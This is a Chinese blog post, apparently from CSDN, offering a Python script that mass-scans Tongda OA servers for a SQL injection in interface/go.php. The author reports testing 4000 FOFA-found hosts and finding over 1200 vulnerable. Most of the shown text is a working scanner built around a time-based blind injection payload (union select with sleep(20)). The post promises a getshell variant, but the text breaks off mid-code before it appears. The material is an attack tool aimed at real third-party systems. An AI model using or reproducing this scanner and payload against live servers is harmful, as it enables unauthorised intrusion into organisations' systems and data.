通达OA interface/go.php 注入漏洞批量检测脚本+利用

小韩韩啊

已于 2022-03-19 05:18:18 修改

阅读量3.7k

点赞数

文章标签：安全 php web安全

于 2022-02-19 19:37:21 首次发布

本文链接：https://blog.csdn.net/wuguojiuai/article/details/123022451

版权

这是一个关于通达OA系统interface/go.php注入漏洞的批量检测和getshell脚本利用的说明。文章提供了python脚本，通过fofa平台对4000个目标进行检测，发现1200多个目标存在该漏洞。

摘要由CSDN通过智能技术生成

批量检测：

稍微改动下，getshell脚本：

python写的，fofa 4000目标检测出来1200+存在：

批量检测：

# -*- coding: utf-8 -*-
import requests,sys
import argparse
import urllib3
import ssl
import vthread


urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context

headers = {
    "Content-Type":"application/x-www-form-urlencoded"
}

session = ""

def isLogin(host):
    try:
        r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)
        return True
    except requests.exceptions.ReadTimeout:
        return False


@v